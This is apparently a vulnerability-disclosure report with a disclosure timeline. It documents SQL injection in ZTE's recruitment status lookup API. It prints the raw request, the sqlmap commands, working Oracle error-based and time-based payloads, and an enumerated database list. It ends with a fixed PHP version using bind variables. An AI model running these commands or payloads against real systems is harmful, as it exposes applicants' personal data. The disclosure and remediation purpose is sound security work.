2015-01-28: Details have been sent to the vendor and are awaiting the vendor's handling
2015-01-30: Vendor has confirmed; details are disclosed only to the vendor
2015-02-09: Details disclosed to core white hats and experts in the relevant field
2015-02-19: Details disclosed to regular white hats
2015-03-01: Details disclosed to intern white hats
2015-03-14: Details disclosed to the public
Security Is a Whole
While checking on WeChat whether my résumé had been accepted (you enter your ID-card number to look up the status), I found that the interface has a SQL injection:
http://zte.pro.bama555.com/api/
The request where the problem occurs:

POST /api/index.php HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://zte.pro.bama555.com:80/api/
Host: zte.pro.bama555.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

code=-1&dopost=status
The `code` parameter is the injection point.
sqlmap.py -r ../sql.txt -p "code" --dbs
sqlmap identified the following injection points with a total of 554 HTTP(s) requests:
---
Place: POST
Parameter: code
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: code=-1' AND 6063=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(112)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (6063=6063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(114)||CHR(119)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'donS'='donS&dopost=status

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: code=-1' AND 5729=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'yerm'='yerm&dopost=status
---
back-end DBMS: Oracle
available databases [19]:
[*] ASSE
[*] CAREER
[*] CTXSYS
[*] HNCAREER
[*] HOLONLINE
[*] HRONLINE
[*] INTERNCAREER
[*] LHC
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SYS
[*] SYSTEM
[*] TIVOLI
[*] WMSYS
[*] XDB
[*] ZHAOPIN
[*] ZTECAREER
The ZHAOPIN database contains 138 tables:
sqlmap.py -r ../sql.txt -p "code" -D ZHAOPIN --tables
A look at the CAREER_USER_ACCOUNT table:

Roughly 300,000 records; I pulled a few as a test and then stopped:

I did not dig further into the information in the other tables.
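The root cause is an ID-card value spliced into the SQL text. As an added illustration (not the vendor's code; the column names ID_CARD and STATUS, the handler names and the OCI8 connection `$conn` are assumptions), here is the lookup as the report implies it was written beside a version that binds the value and validates it first:

```php
<?php
// Added example, not the site's own code. The table name CAREER_USER_ACCOUNT
// is from the sqlmap output; column names and function names are assumed.

// Vulnerable pattern: the POST value becomes part of the SQL grammar, so a
// single quote in `code` rewrites the statement. This is what the
// error-based (XMLType) and time-based payloads in the report rely on.
function lookup_status_vulnerable($conn, string $code)
{
    $sql  = "SELECT STATUS FROM CAREER_USER_ACCOUNT WHERE ID_CARD = '" . $code . "'";
    $stid = oci_parse($conn, $sql);
    oci_execute($stid);
    return oci_fetch_assoc($stid);
}

// Hardened pattern: validate the shape of the input, then pass the value as a
// bind variable so it can never be interpreted as SQL, whatever it contains.
function lookup_status_safe($conn, string $code): ?array
{
    // Mainland ID numbers are 15 digits, or 18 characters ending in a digit or X.
    if (!preg_match('/^\d{15}(\d{2}[0-9Xx])?$/', $code)) {
        return null; // reject before the database is touched
    }
    $sql  = "SELECT STATUS FROM CAREER_USER_ACCOUNT WHERE ID_CARD = :code";
    $stid = oci_parse($conn, $sql);
    oci_bind_by_name($stid, ':code', $code);
    oci_execute($stid);
    $row = oci_fetch_assoc($stid);
    oci_free_statement($stid);
    return $row ?: null;
}
```

Two further points the sqlmap output supports: the error-based technique only works because Oracle error text reaches the HTTP response, so database errors should be logged server-side rather than returned to the client; and the application account could enumerate 19 schemas including SYS and SYSTEM, so it should be restricted to the ZHAOPIN objects it actually needs.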
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-01-30 08:59
Thanks~
None yet